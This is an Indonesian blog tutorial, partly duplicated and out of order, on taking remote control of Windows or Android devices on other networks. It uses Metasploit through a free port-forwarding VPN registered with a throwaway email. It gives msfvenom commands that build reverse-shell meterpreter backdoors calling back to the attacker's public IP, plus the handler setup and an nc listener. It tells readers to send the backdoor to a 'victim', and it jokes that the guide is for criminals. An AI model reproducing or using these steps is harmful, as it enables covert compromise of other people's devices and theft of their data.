Jika sebelumnya saya bahas retas windows dengan metasploit masih dalam ruang lingkup lokal atau terbatas, tapi kali ini saya akan share tutorial bagaimana Hack Windows atau Android Beda Jaringan Dengan Metasploit yg hanya bermodalkan vpn gratisan dari ipjetable.
Saya buat tutorial ini karena banyak yg menginginkan tutorial ini, karena cukup bermodalkan vpn gratisan saja terutama di grup Kali Linux Indonesia :). Oke langsung saja kita mulai bahas tutorialnya
Pertama, kita harus menginstall kebutuhan pada desktop kita terlebih dahulu, yaitu vpn nya atau pptp nya dengan mengetikkan perintah berikut diterminal :
Setelah menginstall semua kebutuhan untuk exploit ini,
Selanjutnya masuk dulu ke web mytemp.email, bisa klik : Disini
Web mytemp.email biasanya digunakan untuk pembuatan email secara instan yg digunakan untuk verifikasi web yg kurang terpercaya.
Setelah masuk web mytemp.email, tinggal klik saja "Start Here", lalu secara otomatis kita sudah mempunyai email instan yg akan kita gunakan pada step berikutnya dibagian daftar di ipjetable.
Atau kita bisa tambah email lagi dengan klik tombol "New Email".
Kemudian kita buka web ipjetablenya untuk mendapatkan vpn yg support port forward yg gratisan :D, oke bisa dibuka dilink berikut : Register IP Jetable
apt-get install network-manager-openvpn-gnome
apt-get install network-manager-pptp
apt-get install network-manager-pptp-gnome
apt-get install network-manager-strongswan
apt-get install network-manager-vpnc
apt-get install network-manager-vpnc-gnome
/etc/init.d/network-manager restart
Setelah menginstall semua kebutuhan untuk exploit ini,
Selanjutnya masuk dulu ke web mytemp.email, bisa klik : Disini
Web mytemp.email biasanya digunakan untuk pembuatan email secara instan yg digunakan untuk verifikasi web yg kurang terpercaya.
Setelah masuk web mytemp.email, tinggal klik saja "Start Here", lalu secara otomatis kita sudah mempunyai email instan yg akan kita gunakan pada step berikutnya dibagian daftar di ipjetable.
Atau kita bisa tambah email lagi dengan klik tombol "New Email".
Kemudian kita buka web ipjetablenya untuk mendapatkan vpn yg support port forward yg gratisan :D, oke bisa dibuka dilink berikut : Register IP Jetable
Setelah masuk web ipjetable, buka web mytemp.email tadi, lalu copykan email yg sudah jadi di web tersebut, misal hajs@c.kadag.ir, lalu copykan ke kolom register email di ipjetable, lalu isi captcha yg dibagian bawah kolom pengisian email tadi, dan biarkan kosong kolom yg dibawahnya lagi yg bertuliskan 16 letters, lalu klik tombol yg kuning "S'inscrire".
Jika sudah mengklik tombol kuning dan muncul tulisan berwarna hijau yg ada tulisan Merci !, berarti register berhasil, lalu cek email kita di mytemp.email tadi, lalu buka pesan dari ipjetablenya dan jangan klik link dari ipjetable dulu.
Jika sudah membuka email dari ipjetable tadi, copy link yg dikirimkan oleh ipjetable tadi dengan cara tekan klik kanan dibagian linknya, lalu pilih copy link location, lalu buka web ini free-proxy.xyz ===> free-proxy.xyz , lalu pastekan link yg diberikan tadi, lalu hapus link yg dipastekan tadi, misal setelah dipastekan jadinya seperti ini : https://xww.ro/?http://ipjetable.net/api/scr.php?af=0&code=MTQ4NDkwODM3NTp0dHF2QHNpbGl3YW5naS5nYTp0Zmk4MjI4OTg6M3poNDEzMTl6YTo4NjY1NzZhNTkzNDU1YzdjYzRmM2Y5NDhhY2UxZWI2Zg
Maka hapus bagian "https://xww.ro/?" menjadi seperti ini : http://ipjetable.net/api/scr.php?af=0&code=MTQ4NDkwODM3NTp0dHF2QHNpbGl3YW5naS5nYTp0Zmk4MjI4OTg6M3poNDEzMTl6YTo4NjY1NzZhNTkzNDU1YzdjYzRmM2Y5NDhhY2UxZWI2Zg
lalu klik unblock.
Maka kita akan diarahkan ke web ipjetable, disana kita masukkan username dan password sesuai dengan email yg kita terima tadi di mytemp, tinggal copy-paste saja lalu klik connexion, jika sudah konek, tinggal kita hubungkan vpn kita di pc kita dengan meng-klik pilihan diujung kanan atas desktop kita lalu pilih vpn, dan klik vpn setting, lalu akan muncul pengaturan networknya, kita klik icon "+" yg ada dibagian kiri bawah.
1. pilih vpn > Point to point tunneling protocol (PPTP).
2. bisa diberi nama bebas, gateway diisi dengan pptp.ipjetable.com
3. username diisi sesuai dengan yg diterima di email kita
4. password pun sama, diisi sesuai yg diterima di email.
5. lalu klik tombol "Advanced" dan ceklis bagian "use point-to-point encryption"
6. kemudian klik OK dan klik save.
Setelah itu, masuk ke folder network, lokasinya ada di etc/network dan disana ada file bernama interfaces , di interfaces itu kita tambahkan teks berikut dibagian paling bawah :
Kurang lebihnya menjadi seperti ini :
Jika sudah mengklik tombol kuning dan muncul tulisan berwarna hijau yg ada tulisan Merci !, berarti register berhasil, lalu cek email kita di mytemp.email tadi, lalu buka pesan dari ipjetablenya dan jangan klik link dari ipjetable dulu.
Jika sudah membuka email dari ipjetable tadi, copy link yg dikirimkan oleh ipjetable tadi dengan cara tekan klik kanan dibagian linknya, lalu pilih copy link location, lalu buka web ini free-proxy.xyz ===> free-proxy.xyz , lalu pastekan link yg diberikan tadi, lalu hapus link yg dipastekan tadi, misal setelah dipastekan jadinya seperti ini : https://xww.ro/?http://ipjetable.net/api/scr.php?af=0&code=MTQ4NDkwODM3NTp0dHF2QHNpbGl3YW5naS5nYTp0Zmk4MjI4OTg6M3poNDEzMTl6YTo4NjY1NzZhNTkzNDU1YzdjYzRmM2Y5NDhhY2UxZWI2Zg
Maka hapus bagian "https://xww.ro/?" menjadi seperti ini : http://ipjetable.net/api/scr.php?af=0&code=MTQ4NDkwODM3NTp0dHF2QHNpbGl3YW5naS5nYTp0Zmk4MjI4OTg6M3poNDEzMTl6YTo4NjY1NzZhNTkzNDU1YzdjYzRmM2Y5NDhhY2UxZWI2Zg
lalu klik unblock.
Maka kita akan diarahkan ke web ipjetable, disana kita masukkan username dan password sesuai dengan email yg kita terima tadi di mytemp, tinggal copy-paste saja lalu klik connexion, jika sudah konek, tinggal kita hubungkan vpn kita di pc kita dengan meng-klik pilihan diujung kanan atas desktop kita lalu pilih vpn, dan klik vpn setting, lalu akan muncul pengaturan networknya, kita klik icon "+" yg ada dibagian kiri bawah.
1. pilih vpn > Point to point tunneling protocol (PPTP).
2. bisa diberi nama bebas, gateway diisi dengan pptp.ipjetable.com
3. username diisi sesuai dengan yg diterima di email kita
4. password pun sama, diisi sesuai yg diterima di email.
5. lalu klik tombol "Advanced" dan ceklis bagian "use point-to-point encryption"
6. kemudian klik OK dan klik save.
Setelah itu, masuk ke folder network, lokasinya ada di etc/network dan disana ada file bernama interfaces , di interfaces itu kita tambahkan teks berikut dibagian paling bawah :
auto eth0
Kurang lebihnya menjadi seperti ini :
sebaiknya pc kita restart dulu, tp mungkin tidak juga, tidak apa2.
Kemudian konekan lah pc kita ke vpn yg telah dibuat tadi, jika gagal konek, coba sekali lagi konek-an.
Jika sudah terhubung, langsung cek ip+port kita dengan membuka web ini : http://www.canyouseeme.org/
Lalu ip publik kita akan terlihat, nah disana kan ada kolom port, jika kita ingin exploit beda jaringan, kita harus membuka akses port kita. langkahnya :
1. silahkan masukkan port ke kolom port website tadi, masukkanlah port yg akan kita jadikan backdoor pada korban, misal 5555, seperti berikut :
2. Jika sudah memasukkan portnya untuk dicek, klik check port, lalu akan muncul tulisan yg menerangkan bahwa port kita sudah forward atau belum, jika belum akan muncul pesan "Error: I could not see your service on IPPUBLIKKITA on port (5555)",
3. Jika sudah forward, maka akan muncul pesan "Success: I can see your service on IPPUBLIKKITA on port (5555)
Your ISP is not blocking port 5555
4. Untuk mengatasi yg belum forward, pertama masukkan dulu port yg akan kita gunakan, lalu klik check port, nah akan muncul pesan error, misal kita gunakkan port 5555, lalu buka terminal kalian lalu ketikkan perintah berikut :
masuk dulu terminal dan ketikkan :
Ini Untuk Windows
Ini Untuk Android
Setelah membuat backdoor, ketik perintah ini :
Untuk Android ketik :
Setelah itu masukkan lhost kita :
Lalu masukkan lport kita :
Kemudian tinggal kita exploit :
Selama proses exploit, kirimkanlah backdoor yg sudah dibuat tadi, dan buka backdoor tersebut, jika android harus kita install terlebih dahulu. Jika sudah dibuka, maka sesi meterpreter-pun terbuka, tinggal kita oprek2 deh tuh korban :D.
Kemudian konekan lah pc kita ke vpn yg telah dibuat tadi, jika gagal konek, coba sekali lagi konek-an.
Jika sudah terhubung, langsung cek ip+port kita dengan membuka web ini : http://www.canyouseeme.org/
Lalu ip publik kita akan terlihat, nah disana kan ada kolom port, jika kita ingin exploit beda jaringan, kita harus membuka akses port kita. langkahnya :
1. silahkan masukkan port ke kolom port website tadi, masukkanlah port yg akan kita jadikan backdoor pada korban, misal 5555, seperti berikut :
2. Jika sudah memasukkan portnya untuk dicek, klik check port, lalu akan muncul tulisan yg menerangkan bahwa port kita sudah forward atau belum, jika belum akan muncul pesan "Error: I could not see your service on IPPUBLIKKITA on port (5555)",
3. Jika sudah forward, maka akan muncul pesan "Success: I can see your service on IPPUBLIKKITA on port (5555)
Your ISP is not blocking port 5555
4. Untuk mengatasi yg belum forward, pertama masukkan dulu port yg akan kita gunakan, lalu klik check port, nah akan muncul pesan error, misal kita gunakkan port 5555, lalu buka terminal kalian lalu ketikkan perintah berikut :
nc -vlp 5555Jika sudah mengetikkan perintah tersebut diterminal, lalu coba check port kalian lagi di web tadi, maka pesan error pun akan menjadi sukses, nah tinggal kita buat backdoornya, seperti berikut :
masuk dulu terminal dan ketikkan :
Ini Untuk Windows
msfvenom -p windows/meterpreter/reverse_tcp lhost=ippublikkalian lport=portygtadikitacheck R > namafile.exe
Ini Untuk Android
msfvenom -p android/meterpreter/reverse_tcp lhost=ippublikkalian lport=portygtadikitacheck R > namafile.apk
Setelah membuat backdoor, ketik perintah ini :
msfconsoleTunggu beberapa saat, lalu setelah masuk msfconsole, ketikkan beberapa perintah berikut :
use multi/handlerTekan enter, trus untuk windows ketik :
set payload windows/meterpreter/reverse_tcp
Untuk Android ketik :
set payload android/meterpreter/reverse_tcp
Setelah itu masukkan lhost kita :
set lhost IPPUBLIKSENDIRI
Lalu masukkan lport kita :
set lport PORTYGBERHASILFORWARD
Kemudian tinggal kita exploit :
exploit
Selama proses exploit, kirimkanlah backdoor yg sudah dibuat tadi, dan buka backdoor tersebut, jika android harus kita install terlebih dahulu. Jika sudah dibuka, maka sesi meterpreter-pun terbuka, tinggal kita oprek2 deh tuh korban :D.
Sekian saja tutorial retas Windows atau Android Beda jaringan dengan metasploit.
Ingat, tutorial ini hanya untuk kriminal saja, ehh pembelajaran saja :v,
sorry kalo kurang jelas, jika ada yg kurang paham, tinggal tanya lewat post komentar :)
Ingat, tutorial ini hanya untuk kriminal saja, ehh pembelajaran saja :v,
sorry kalo kurang jelas, jika ada yg kurang paham, tinggal tanya lewat post komentar :)
ConversionConversion EmoticonEmoticon